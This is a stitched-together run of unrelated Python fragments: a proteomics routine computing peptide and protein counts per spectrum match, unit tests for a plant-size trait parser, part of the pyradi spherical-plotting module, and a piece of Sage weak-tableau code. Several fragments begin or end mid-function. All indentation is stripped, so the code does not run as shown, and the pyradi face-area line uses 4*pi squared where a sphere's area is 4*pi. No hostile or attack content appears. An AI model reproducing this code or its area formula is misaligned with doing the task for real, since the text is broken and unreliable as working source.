else:
pro_shared_dict[protein] = 1
# debug
if protein in pro_balanced_shared_dict:
pro_balanced_shared_dict[protein] += 1.0/num_pro_float
else:
pro_balanced_shared_dict[protein] = 1.0/num_pro_float
# debug
else:
if pro_list[0] in pro_unique_dict:
pro_unique_dict[pro_list[0]] += 1
else:
pro_unique_dict[pro_list[0]] = 1
for pro in pro_list:
if pro in pro_pep_dict:
l = pro_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_pep_dict[pro] = l
if len(pro_list) == 1:
if pro_list[0] in pro_unique_pep_dict:
l = pro_unique_pep_dict[pro_list[0]]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_unique_pep_dict[pro_list[0]] = l
else:
for pro in pro_list:
if pro in pro_shared_pep_dict:
l = pro_shared_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_shared_pep_dict[pro] = l
if num_changed != 0:
if not print_flag:
print("num changed %d" % num_changed)
# collect features
num_unique_per_pro = 0
num_shared_per_pro = 0
num_balanced_shared_per_pro = 0
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to protein
max_balanced_per_psm = 0 # linked to a protein
max_linked_unique_per_psm = 0
max_linked_shared_per_psm = 0
max_linked_balanced_unique_per_psm = 0
max_linked_balanced_shared_per_psm = 0
for oPsm in lPsm:
oPsm.IPSC = peptide_with_modification_dict[oPsm.IdentifiedPeptide]
oPsm.OPSC = peptide_dict[oPsm.OriginalPeptide]
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to protein
max_balanced_per_psm = 0 # linked to a protein
max_linked_unique_per_psm = 0
max_linked_shared_per_psm = 0
max_linked_balanced_unique_per_psm = 0
max_linked_balanced_shared_per_psm = 0
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
for protein in pro_list:
if len(pro_pep_dict[protein]) > oPsm.PPC:
oPsm.PPC = len(pro_pep_dict[protein])
if len(pro_list) == 1 and len(pro_unique_pep_dict[protein]) > oPsm.UPPC:
oPsm.UPPC = len(pro_unique_pep_dict[protein])
if len(pro_list) > 1 and len(pro_shared_pep_dict[protein]) > oPsm.SPPC:
oPsm.SPPC = len(pro_shared_pep_dict[protein])
num_unique_per_pro = 0
num_shared_per_pro = 0
num_balanced_shared_per_pro = 0
if protein in pro_unique_dict:
num_unique_per_pro = pro_unique_dict[protein]
if len(pro_list) == 1:
# pass
num_unique_per_pro -= 1
if protein in pro_shared_dict:
num_shared_per_pro = pro_shared_dict[protein]
if len(pro_list) > 1:
# pass
num_shared_per_pro -= 1
if protein in pro_balanced_shared_dict:
num_balanced_shared_per_pro = pro_balanced_shared_dict[protein]
if len(pro_list) > 1:
num_balanced_shared_per_pro -= 1.0/ float(len(pro_list))
if num_unique_per_pro > max_unique_per_psm:
max_unique_per_psm = num_unique_per_pro
if num_shared_per_pro > max_shared_per_psm:
max_shared_per_psm = num_shared_per_pro
if num_unique_per_pro + num_shared_per_pro > max_per_psm:
max_per_psm = num_unique_per_pro + num_shared_per_pro
max_linked_unique_per_psm = num_unique_per_pro
max_linked_shared_per_psm = num_shared_per_pro
num_unique_per_psm += num_unique_per_pro
num_shared_per_psm += num_shared_per_pro
if num_balanced_shared_per_pro > max_balanced_shared_per_psm:
max_balanced_shared_per_psm = num_balanced_shared_per_pro
if num_unique_per_pro + num_balanced_shared_per_pro > max_balanced_per_psm:
max_balanced_per_psm = num_unique_per_pro + num_balanced_shared_per_pro
max_linked_balanced_unique_per_psm = num_unique_per_pro
max_linked_balanced_shared_per_psm = num_balanced_shared_per_pro
num_balanced_shared_per_psm += num_balanced_shared_per_pro
oPsm.UPSC = num_unique_per_psm
oPsm.SPSC = num_shared_per_psm
oPsm.SPSC = num_unique_per_psm + num_shared_per_psm
oPsm.UPSC = max_unique_per_psm
oPsm.SPSC = max_shared_per_psm
if len(oPsm.protein_list) == 1:
oPsm.UPSC = 1
else:
oPsm.UPSC = 0
if simple_feature_bool:
oPsm.SPSC = max_linked_unique_per_psm
else:
oPsm.SPSC = max_linked_unique_per_psm + max_linked_shared_per_psm
## collect spectrum and protein level features
def generate_Prophet_features_test(lPsm, config_dict):
# get some statistics
global num_forward_psms_before_filtering
num_forward_psms_before_filtering = 0
for one_psm in lPsm:
if one_psm.RealLabel == LabelFwd:
num_forward_psms_before_filtering += 1
simple_feature_bool = False
if float(num_forward_psms_before_filtering)/float(len(lPsm)) > 0.7 and len(lPsm) > 1500000:
simple_feature_bool = True
if config_dict[pep_iden_str + search_type_str] == 'SIP':
simple_feature_bool = False
# peptide with PTM dictionary is for IPSC
peptide_with_modification_dict = {}
# peptide without PTM dictionary is for OPSC
peptide_dict = {}
peptide_protein_dict = {}
# psm_set = Set()
for oPsm in lPsm:
oPsm.NMC = get_num_missed_cleavage_sites(oPsm.OriginalPeptide,
config_dict[pep_iden_str + cleave_after_residues_str],
config_dict[pep_iden_str + cleave_before_residues_str])
if oPsm.IdentifiedPeptide in peptide_with_modification_dict:
peptide_with_modification_dict[oPsm.IdentifiedPeptide] += 1
else:
peptide_with_modification_dict[oPsm.IdentifiedPeptide] = 1
if oPsm.OriginalPeptide in peptide_protein_dict:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
for protein in oPsm.protein_list:
if protein not in pro_list:
pro_list.append(protein)
else:
pro_list = []
for pro in oPsm.protein_list:
if pro not in pro_list:
pro_list.append(pro)
peptide_protein_dict[oPsm.OriginalPeptide] = pro_list
pattern = re.compile('[^\w\[\]]')
for key, _value in peptide_with_modification_dict.iteritems():
peptide_str = pattern.sub('', key)
if peptide_str in peptide_dict:
# peptide_dict[peptide_str] += 1
peptide_dict[peptide_str] += _value
else:
# peptide_dict[peptide_str] = 1
peptide_dict[peptide_str] = _value
# # sibling peptides
pro_unique_dict = {} # number of unique peptide of a protain
pro_shared_dict = {} # number of shared peptide of a protain
# debug
pro_balanced_shared_dict = {}
# debug
num_changed = 0
changed_flag = False
# psm_set.clear()
pro_pep_dict = {}
pro_unique_pep_dict = {}
pro_shared_pep_dict = {}
for oPsm in lPsm:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
'''
if len(oPsm.protein_list) != len(pro_list):
print('check 3')
print(oPsm.protein_list)
print(pro_list)
'''
changed_flag = False
print_flag = True
for protein in pro_list:
if not protein in oPsm.protein_list:
changed_flag = True
if not print_flag:
print(pro_list)
print(oPsm.protein_list)
print_flag = True
oPsm.protein_list.append(protein)
if len(oPsm.protein_list) != len(pro_list):
print('check 4')
print(oPsm.protein_list)
print(pro_list)
exit(1)
if changed_flag:
oPsm.set_protein_names()
oPsm.RealLabel = get_protein_type(oPsm.ProteinNames)
# print(oPsm.OriginalPeptide)
num_changed += 1
'''
unique_id_str = oPsm.FileName + '_' + str(oPsm.ScanNumber) + '_' + oPsm.IdentifiedPeptide
if unique_id_str in psm_set:
continue
else:
psm_set.add(unique_id_str)
'''
if len(pro_list) > 1:
num_pro_float = float(len(pro_list))
for protein in pro_list:
if protein in pro_shared_dict:
pro_shared_dict[protein] += 1
else:
pro_shared_dict[protein] = 1
# debug
if protein in pro_balanced_shared_dict:
pro_balanced_shared_dict[protein] += 1.0/num_pro_float
else:
pro_balanced_shared_dict[protein] = 1.0/num_pro_float
# debug
else:
if pro_list[0] in pro_unique_dict:
pro_unique_dict[pro_list[0]] += 1
else:
pro_unique_dict[pro_list[0]] = 1
for pro in pro_list:
if pro in pro_pep_dict:
l = pro_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_pep_dict[pro] = l
if len(pro_list) == 1:
if pro_list[0] in pro_unique_pep_dict:
l = pro_unique_pep_dict[pro_list[0]]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_unique_pep_dict[pro_list[0]] = l
else:
for pro in pro_list:
if pro in pro_shared_pep_dict:
l = pro_shared_pep_dict[pro]
if oPsm.OriginalPeptide not in l:
l.append(oPsm.OriginalPeptide)
else:
l = []
l.append(oPsm.OriginalPeptide)
pro_shared_pep_dict[pro] = l
if num_changed != 0:
if not print_flag:
print("num changed %d" % num_changed)
# collect features
num_unique_per_pro = 0
num_shared_per_pro = 0
num_balanced_shared_per_pro = 0
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to protein
max_balanced_per_psm = 0 # linked to a protein
max_linked_unique_per_psm = 0
max_linked_shared_per_psm = 0
max_linked_balanced_unique_per_psm = 0
max_linked_balanced_shared_per_psm = 0
for oPsm in lPsm:
oPsm.IPSC = peptide_with_modification_dict[oPsm.IdentifiedPeptide]
oPsm.OPSC = peptide_dict[oPsm.OriginalPeptide]
max_unique_per_psm = 0
max_shared_per_psm = 0
max_balanced_shared_per_psm = 0
num_unique_per_psm = 0
num_shared_per_psm = 0
num_balanced_shared_per_psm = 0
max_per_psm = 0 # linked to | |
<filename>tests/patterns/test_size_.py
"""Test plant size trait matcher."""
# pylint: disable=missing-function-docstring, too-many-public-methods
import unittest
from tests.setup import test
class TestSize(unittest.TestCase):
"""Test plant size trait parsers."""
# def test_size_00(self):
# test('Leaf (12-)23-34 × 45-56 cm wide')
def test_size_01(self):
self.assertEqual(
test('Leaf (12-)23-34 × 45-56 cm'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'length_min': 12.0,
'length_low': 23.0,
'length_high': 34.0,
'length_units': 'cm',
'trait': 'size',
'start': 5,
'end': 15,
'part': 'leaf'},
{'width_low': 45.0,
'width_high': 56.0,
'width_units': 'cm',
'trait': 'size',
'start': 18,
'end': 23,
'part': 'leaf'},
{'units': 'cm', 'trait': 'units', 'start': 24, 'end': 26}]
)
def test_size_02(self):
self.assertEqual(
test('leaf (12-)23-34 × 45-56'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4}]
)
def test_size_03(self):
self.assertEqual(
test('blade 1.5–5(–7) cm'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 5},
{'length_low': 1.5,
'length_high': 5.0,
'length_max': 7.0,
'length_units': 'cm',
'trait': 'size',
'start': 6,
'end': 15,
'part': 'leaf'},
{'units': 'cm', 'trait': 'units', 'start': 16, 'end': 18}]
)
def test_size_04(self):
self.assertEqual(
test('leaf shallowly to deeply 5–7-lobed'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'low': 5, 'high': 7, 'trait': 'count',
'start': 25, 'end': 28, 'part': 'leaf', 'subpart': 'lobe'},
{'subpart': 'lobe', 'trait': 'subpart',
'start': 29, 'end': 34, 'part': 'leaf'}]
)
def test_size_05(self):
self.assertEqual(
test('leaf 4–10 cm wide'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'width_low': 4.0,
'width_high': 10.0,
'width_units': 'cm',
'trait': 'size',
'start': 5,
'end': 9,
'part': 'leaf'},
{'units': 'cm', 'trait': 'units', 'start': 10, 'end': 12},
{'dimension': 'width', 'trait': 'dimension', 'start': 13,
'end': 17}]
)
def test_size_06(self):
self.assertEqual(
test('leaf sinuses 1/5–1/4 to base'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'subpart': 'sinus',
'trait': 'subpart',
'start': 5,
'end': 12,
'part': 'leaf'},
{'part_as_loc': 'to base',
'trait': 'part_as_loc',
'start': 21,
'end': 28,
'part': 'leaf',
'subpart': 'sinus'}]
)
def test_size_07(self):
self.assertEqual(
test('petiolules 2–5 mm'),
[{'part': 'petiolule', 'trait': 'part', 'start': 0, 'end': 10},
{'length_low': 2.0,
'length_high': 5.0,
'length_units': 'mm',
'trait': 'size',
'start': 11,
'end': 14,
'part': 'petiolule'},
{'units': 'mm', 'trait': 'units', 'start': 15, 'end': 17}]
)
def test_size_08(self):
self.assertEqual(
test('petiolules 2–5 mm; coarsely serrate; petioles 16–28 mm.'),
[{'part': 'petiolule', 'trait': 'part', 'start': 0, 'end': 10},
{'length_low': 2.0,
'length_high': 5.0,
'length_units': 'mm',
'trait': 'size',
'start': 11,
'end': 14,
'part': 'petiolule'},
{'units': 'mm', 'trait': 'units', 'start': 15, 'end': 17},
{'margin_shape': 'serrate',
'trait': 'margin_shape',
'start': 19,
'end': 35,
'part': 'petiole'},
{'part': 'petiole', 'trait': 'part', 'start': 37, 'end': 45},
{'length_low': 16.0,
'length_high': 28.0,
'length_units': 'mm',
'trait': 'size',
'start': 46,
'end': 51,
'part': 'petiole'},
{'units': 'mm', 'trait': 'units', 'start': 52, 'end': 54}]
)
def test_size_09(self):
self.assertEqual(
test('Leaves: petiole 2–15 cm;'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 6},
{'part': 'petiole', 'trait': 'part', 'start': 8, 'end': 15},
{'length_low': 2.0,
'length_high': 15.0,
'length_units': 'cm',
'trait': 'size',
'start': 16,
'end': 20,
'part': 'petiole'},
{'units': 'cm', 'trait': 'units', 'start': 21, 'end': 23}]
)
def test_size_10(self):
self.assertEqual(
test('petiole [5–]7–25[–32] mm, glabrous,'),
[{'part': 'petiole', 'trait': 'part', 'start': 0, 'end': 7},
{'length_min': 5.0,
'length_low': 7.0,
'length_high': 25.0,
'length_max': 32.0,
'length_units': 'mm',
'trait': 'size',
'start': 8,
'end': 21,
'part': 'petiole'},
{'units': 'mm', 'trait': 'units', 'start': 22, 'end': 24}]
)
def test_size_11(self):
self.assertEqual(
test('leaf 2–4 cm × 2–10 mm'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'length_low': 2.0,
'length_high': 4.0,
'length_units': 'cm',
'trait': 'size',
'start': 5,
'end': 8,
'part': 'leaf'},
{'units': 'cm', 'trait': 'units', 'start': 9, 'end': 11},
{'width_low': 2.0,
'width_high': 10.0,
'width_units': 'mm',
'trait': 'size',
'start': 14,
'end': 18,
'part': 'leaf'},
{'units': 'mm', 'trait': 'units', 'start': 19, 'end': 21}]
)
def test_size_12(self):
self.assertEqual(
test('leaf deeply to shallowly lobed, 4–5(–7) cm wide,'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'subpart': 'lobe',
'trait': 'subpart',
'start': 25,
'end': 30,
'part': 'leaf'},
{'width_low': 4.0,
'width_high': 5.0,
'width_max': 7.0,
'width_units': 'cm',
'trait': 'size',
'start': 32,
'end': 39,
'part': 'leaf'},
{'units': 'cm', 'trait': 'units', 'start': 40, 'end': 42},
{'dimension': 'width', 'trait': 'dimension', 'start': 43,
'end': 47}]
)
def test_size_13(self):
self.assertEqual(
test("""
Leaves 3-foliolate, lateral pair of leaflets
deeply lobed, petiolules 2–5 mm,"""),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 6},
{'low': 3,
'trait': 'count',
'start': 7,
'end': 8,
'part': 'leaf',
'subpart': 'foliolate'},
{'subpart': 'foliolate',
'trait': 'subpart',
'start': 9,
'end': 18,
'part': 'leaf'},
{'location': 'lateral',
'trait': 'location',
'start': 20,
'end': 27,
'part': 'leaflet',
'subpart': 'foliolate'},
{'part': 'leaflet', 'trait': 'part', 'start': 36, 'end': 44},
{'subpart': 'lobe',
'trait': 'subpart',
'start': 52,
'end': 57,
'part': 'leaflet'},
{'part': 'petiolule', 'trait': 'part', 'start': 59, 'end': 69},
{'length_low': 2.0,
'length_high': 5.0,
'length_units': 'mm',
'trait': 'size',
'start': 70,
'end': 73,
'part': 'petiolule',
'subpart': 'lobe'},
{'units': 'mm', 'trait': 'units', 'start': 74, 'end': 76}]
)
def test_size_14(self):
self.assertEqual(
test('terminal leaflet 3–5 cm, blade petiolule 3–12 mm,'),
[{'location': 'terminal',
'trait': 'location',
'start': 0,
'end': 8,
'part': 'leaflet'},
{'part': 'leaflet',
'trait': 'part',
'start': 9,
'end': 16,
'location': 'terminal'},
{'length_low': 3.0,
'length_high': 5.0,
'length_units': 'cm',
'trait': 'size',
'start': 17,
'end': 20,
'location': 'terminal',
'part': 'leaflet'},
{'units': 'cm', 'trait': 'units', 'start': 21, 'end': 23},
{'part': 'leaf',
'trait': 'part',
'start': 25,
'end': 30,
'location': 'terminal'},
{'part': 'petiolule',
'trait': 'part',
'start': 31,
'end': 40,
'location': 'terminal'},
{'length_low': 3.0,
'length_high': 12.0,
'length_units': 'mm',
'trait': 'size',
'start': 41,
'end': 45,
'location': 'terminal',
'part': 'petiolule'},
{'units': 'mm', 'trait': 'units', 'start': 46, 'end': 48}]
)
def test_size_15(self):
self.assertEqual(
test('leaf shallowly 3–5(–7)-lobed, 5–25 × (8–)10–25(–30) cm,'),
[{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
{'low': 3,
'high': 5,
'max': 7,
'trait': 'count',
'start': 15,
'end': 22,
'part': 'leaf',
'subpart': 'lobe'},
{'subpart': 'lobe',
'trait': 'subpart',
'start': 23,
'end': 28,
'part': 'leaf'},
{'length_low': 5.0,
'length_high': 25.0,
'length_units': 'cm',
'trait': 'size',
'start': 30,
'end': 34,
'part': 'leaf',
'subpart': 'lobe'},
{'width_min': 8.0,
'width_low': 10.0,
'width_high': 25.0,
'width_max': 30.0,
'width_units': 'cm',
'trait': 'size',
'start': 37,
'end': 51,
'part': 'leaf',
'subpart': 'lobe'},
{'units': 'cm', 'trait': 'units', 'start': 52, 'end': 54}]
)
def test_size_16(self):
self.assertEqual(
test('(3–)5-lobed, 6–20(–30) × 6–25 cm,'),
[{'min': 3,
'low': 5,
'trait': 'count',
'start': 0,
'end': 5,
'subpart': 'lobe'},
{'subpart': 'lobe', 'trait': 'subpart', 'start': 6, 'end': 11},
{'length_low': 6.0,
'length_high': 20.0,
'length_max': 30.0,
'length_units': 'cm',
'trait': 'size',
'start': 13,
'end': 22,
'subpart': 'lobe'},
{'width_low': 6.0,
'width_high': 25.0,
'width_units': 'cm',
'trait': 'size',
'start': 25,
'end': 29,
'subpart': 'lobe'},
{'units': 'cm', 'trait': 'units', 'start': 30, 'end': 32}]
)
def test_size_17(self):
self.assertEqual(
test('petiole to 11 cm;'),
[{'part': 'petiole', 'trait': 'part', 'start': 0, 'end': 7},
{'length_high': 11.0,
'length_units': 'cm',
'trait': 'size',
'start': 11,
'end': 13,
'part': 'petiole'},
{'units': 'cm', 'trait': 'units', 'start': 14, 'end': 16}]
)
def test_size_18(self):
self.assertEqual(
test('petals (1–)3–10(–12) mm (pistillate) or 5–8(–10) mm (staminate)'),
[{'part': 'petal', 'trait': 'part', 'start': 0, 'end': 6,
'sex': 'pistillate'},
{'length_min': 1.0,
'length_low': 3.0,
'length_high': 10.0,
'length_max': 12.0,
'length_units': 'mm',
'sex': 'pistillate',
'trait': 'size',
'start': 7,
'end': 20,
'part': 'petal'},
{'units': 'mm', 'trait': 'units', 'start': 21, 'end': 23},
{'sex': 'pistillate', 'trait': 'sex', 'start': 24, 'end': 36,
'part': 'petal'},
{'length_low': 5.0,
'length_high': 8.0,
'length_max': 10.0,
'length_units': 'mm',
'sex': 'staminate',
'trait': 'size',
'start': 40,
'end': 48,
'part': 'petal'},
{'units': 'mm', 'trait': 'units', 'start': 49, 'end': 51},
{'sex': 'staminate', 'trait': 'sex', 'start': 52, 'end': 63,
'part': 'petal'}]
)
def test_size_19(self):
self.assertEqual(
test('Flowers 5–10 cm diam.; hypanthium 4–8 mm,'),
[{'part': 'flower', 'trait': 'part', 'start': 0, 'end': 7},
{'diameter_low': 5.0,
'diameter_high': 10.0,
'diameter_units': 'cm',
'trait': 'size',
'start': 8,
'end': 12,
'part': 'flower'},
{'units': 'cm', 'trait': 'units', 'start': 13, 'end': 15},
{'dimension': 'diameter',
'trait': 'dimension',
'start': 16,
'end': 20},
{'part': 'hypanthium', 'trait': 'part', 'start': 23, 'end': 33},
{'length_low': 4.0,
'length_high': 8.0,
'length_units': 'mm',
'trait': 'size',
'start': 34,
'end': 37,
'part': 'hypanthium'},
{'units': 'mm', 'trait': 'units', 'start': 38, 'end': 40}]
)
def test_size_20(self):
self.assertEqual(
test('Flowers 5--16 × 4--12 cm'),
[{'part': 'flower', 'trait': 'part', 'start': 0, 'end': 7},
{'length_low': 5.0,
'length_high': 16.0,
'length_units': 'cm',
'trait': 'size',
'start': 8,
'end': 13,
'part': 'flower'},
{'width_low': 4.0,
'width_high': 12.0,
'width_units': 'cm',
'trait': 'size',
'start': 16,
'end': 21,
'part': 'flower'},
{'units': 'cm', 'trait': 'units', 'start': 22, 'end': 24}]
)
def test_size_21(self):
self.assertEqual(
test("""
Inflorescences formed season before flowering and exposed
during winter; staminate catkins 3--8.5 cm,"""),
[{'part': 'inflorescence',
'trait': 'part',
'start': 0,
'end': 14,
'sex': 'staminate'},
{'sex': 'staminate', 'trait': 'sex', 'start': 73, 'end': 82,
'part': 'catkin'},
{'part': 'catkin',
'trait': 'part',
'start': 83,
'end': 90,
'sex': 'staminate'},
{'length_low': 3.0,
'length_high': 8.5,
'length_units': 'cm',
'trait': 'size',
'start': | |
# $Id$
# $HeadURL$
################################################################
# The contents of this file are subject to the BSD 3Clause (New) License
# you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://directory.fsf.org/wiki/License:BSD_3Clause
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
# The Original Code is part of the PyRadi toolkit.
# The Initial Developer of the Original Code is <NAME>,
# Portions created by <NAME> are Copyright (C) 2006-2012
# All Rights Reserved.
# Contributor(s): ______________________________________.
################################################################
"""
Mayavi appears to be now available for Python 3.5 (but not 3.6) on the menpo repo:
https://anaconda.org/menpo/mayavi
conda install -c menpo mayavi=4.5.0
Please note that all mayavi-based code has been commented out.
This is because Mayavi is (1) not available in Anaconda and (2) not
yet ported to Python 3. This capability might be brought back if
there is a need.
This module provides tools for creating and viewing spherical plots.
The spherical plotting tool, using Mayavi, requires two sets of data
in order to create the spherical plot: the vertex locations in (x,y,z)
and the spatial relationship between the vertices, i.e. triangulation of
nearest neighbours. This spatial relationship is required to create
surface elements between the vertices. If the spatial relationship
is not known, the data is merely a cloud of points, with no surface
content.
The easiest way to create the spatial relationships between the vertices
was to use a complex hull polygon model of an object. The polygon or
wireframe model has the requires vertices and spatial relationships.
In the original application of this tool, a series of spheres were created
using MeshLab. The essential property of these spheres was that the vertices
on the surface of the spheres were spaced equidistant over the surface, i.e.
an optimal spatial sampling distribution. The files were exported as OFF
files, and should be in the pyradi data/plotspherical directory.
There are 6 possible input files, each with different number of samples
on the unit sphere: 12, 42, 162, 642, 2562 or 10242.
Any object, with the required vertices and spatial relationships can
be used. it does not have to be equi-sampled spheres.
Note that the spherical plot has no way to discriminate between negative
values and a pi phase shift: there is confusion between sign and
direction. This is inherent in the conversion between cartesian
and spherical coordinates. The user has to make provision for this,
possibly by plotting only negative or only positive values.
The data must be in the OFF wireframe format.
There are two possible trajectory file types:
* 'Rotate' Stationary sensor and object with the target rotating.
In this case the trajectory file specifies the target trajectory.
* 'Orbit' Stationary object with orbiting sensor.
In this case the trajectory file specifies the sensor trajectory.
The sphere data available in pyradi/data/plotspherical are:
=============== =========== ============== ===============
Filename Resolution Number Number
. (degrees) points triangles
=============== =========== ============== ===============
sphere_0_12 63.4 12 20
sphere_1_42 33.9 42 80
sphere_2_162 17.2 162 320
sphere_3_642 8.6 642 1280
sphere_4_2562 4.32 2562 5120
sphere_5_10242 2.16 10242 20480
sphere_6_40962 1.08 40962 81920
sphere_7_163842 0.54 163842 327680
=============== =========== ============== ===============
The workflow is as follows:
#. Use writeOSSIMTrajOFFFile (or your own equivalent) to
calculate the appropriate trajectory file.
At the same time, there are two additional files created
(vertices and triangles) - keep these safe.
#. Create your data set (e.g. run simulation) using the trajectory
file. Collect the simulation data in a format for plotting.
#. Use the simulation data, together with the triangles and
vertices file, to plot the data. The triangles and vertices
are require to set up the plotting environment, consider this
the three-dimensional 'grid', while the simulation data
provides the data to be plotted in this grid.
This tool was originally developed to create trajectory files for the
Denel/CSIR OSSIM simulation. The code was restructured for greater
universal application, but the final example is still an OSSIM case.
See the __main__ function for examples of use.
This package was partly developed to provide additional material in support of students
and readers of the book Electro-Optical System Analysis and Design: A Radiometry
Perspective, <NAME>, ISBN 9780819495693, SPIE Monograph Volume
PM236, SPIE Press, 2013. http://spie.org/x648.html?product_id=2021423&origin_id=x646
"""
__version__= "$Revision$"
__author__= 'pyradi team'
__all__= ['readOffFile', 'getRotateFromOffFile', 'getOrbitFromOffFile',
'writeOSSIMTrajOFFFile',
'writeOSSIMTrajElevAzim', 'getOrbitFromElevAzim','getRotateFromElevAzim',
'plotSpherical', 'plotOSSIMSpherical',
'sphericalPlotElevAzim', 'polarPlotElevAzim',
'globePlotElevAzim','plotVertexSphere',]
import sys
# if sys.version_info[0] > 2:
# print("pyradi is not yet ported to Python 3, because imported modules are not yet ported")
# exit(-1)
import os.path, fnmatch
import numpy as np
from scipy.interpolate import interp1d
#mayavi commented out
#from mayavi import mlab
##############################################################################
##
def readOffFile(filename):
"""Reads an OFF file and returns the vertices and triangles in numpy arrays.
The OFF file is read and the data captured in the array structures.
This is a fairly trivial reading task.
Args:
| filename (string): name of the OFF file
Returns:
| vertices(np.array([])): array of vertices as [x y z]
| triangles(np.array([])): array of triangles as []
Raises:
| No exception is raised.
"""
with open(filename) as f:
#first line [0] has only the word OFF
lines = f.readlines()
if lines[0].find('OFF') < 0:
print('not an OFF file')
return (None,None)
#second line [1] has counts for ....
counts = lines[1].split()
vertexCount = int(counts[0])
faceCount = int(counts[1])
edgeCount = int(counts[2])
print('vertexCount={0} faceCount={1} edgeCount={2}'.format(vertexCount,
faceCount, edgeCount))
#calculate the approx sampling density as surface of sphere divided by
#number of faces, then size of each face, then angle from size
areaFace = 4 * (np.pi)**2 / faceCount
sizeFace = np.sqrt(areaFace / 2)
resAngle = sizeFace
print('sampling density is approx {0:.2f} mrad or {1:.3f} degrees.'.format(
1000 * resAngle,resAngle * 180 / np.pi))
# then follows vertices from lines[2] to lines[2+vertexCount]
vertices = np.asarray([float(s) for s in lines[2].split()])
for line in lines[3:2+vertexCount]:
vertices = np.vstack((vertices,np.asarray([float(s) \
for s in line.split()])))
# now extract the triangles lines[2+vertexCount] to lines(-1)
triangles = np.asarray([int(s) for s in lines[2+vertexCount].split()[1:]],dtype='i4')
for line in lines[3+vertexCount:2+vertexCount+faceCount]:
if len(line) > 0:
triangles = np.vstack((triangles,np.asarray([int(s) \
for s in line.split()[1:]])))
if triangles.shape[0] != faceCount or vertices.shape[0] != vertexCount:
return (None,None)
else:
return (vertices, triangles)
##############################################################################
##
def getRotateFromOffFile(filename, xPos, yPos, zPos):
""" Reads an OFF file and returns object attitude and position.
Calculate the pitch and yaw angles to point the object's X-axis towards
the OFF file vertex directions.
Euler order is yaw-pitch-roll, with roll equal to zero.
Yaw is defined in xy plane.
Pitch is defined in xz plane.
Roll is defined in yz plane.
The object is assumed to stationary at the position (xPos, yPos, zPos),
the position arrays are the same length as the attitude angle arrays,
but all values in each individual array are all the same.
Args:
| filename (string): OFF file filename
| xPos (double): object position on x axis
| yPos (double): object position on y axis
| zPos (double): object position on z axis
Returns:
| x(np.array()): array of x object location values
| y(np.array()): array of y object location values
| z(np.array()): array of z object location values
| roll(np.array()): array of object location roll values
| pitch(np.array()): array of object location pitch values
| yaw(np.array()): array of object location yaw values
| vertices(np.array([])): array of vertices as [x y z]
| triangles(np.array([])): array of triangles as []
Raises:
| No exception is raised.
"""
(vertices, triangles) = readOffFile(filename)
if vertices is not None:
ysign = (1 * (vertices[:,1] < 0) - 1 * (vertices[:,1] >= 0)).reshape(-1, 1)
xyradial = (np.sqrt((vertices[:,0]) ** 2 + \
(vertices[:,1]) ** 2)).reshape(-1, 1)
deltaX = (-vertices[:,0]).reshape(-1, 1)
#the strange '+ (xyradial==0)' below is to prevent divide by zero
cosyaw = ((deltaX/(xyradial + (xyradial==0))) * (xyradial!=0) + 0 * (xyradial==0))
yaw = ysign * np.arccos(cosyaw)
pitch = - np.arctan2((-vertices[:,2]).reshape(-1, 1), xyradial).reshape(-1, 1)
roll = np.zeros(yaw.shape).reshape(-1, 1)
onesv = np.ones(yaw.shape).reshape(-1, 1)
x = xPos * onesv
y = yPos * onesv
z = zPos * onesv
return (x, y, z, roll, pitch, yaw, vertices, triangles)
else:
return (None, None, None, None, None, None, None, None)
##############################################################################
##
def getOrbitFromOffFile(filename, xTargPos, yTargPos, zTargPos, distance):
""" Reads an OFF | |
1)], 2: [(2, 0)]}
sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
sage: t.dictionary_of_coordinates_at_residues(1)
{2: [(0, 2)], 3: [(0, 3), (1, 0)]}
sage: t = WeakTableau([], 3)
sage: t.dictionary_of_coordinates_at_residues(1)
{}
"""
d = {}
for r in self.residues_of_entries(v):
d[r] = []
for i in range(len(self)):
for j in range(len(self[i])):
if self[i][j]==v and (j - i)%(self.k+1) == r:
d[r]+=[(i,j)]
return d
def list_of_standard_cells(self):
r"""
Return a list of lists of the coordinates of the standard cells of ``self``.
INPUT:
- ``self`` -- a weak `k`-tableau in core representation with partition weight
OUTPUT:
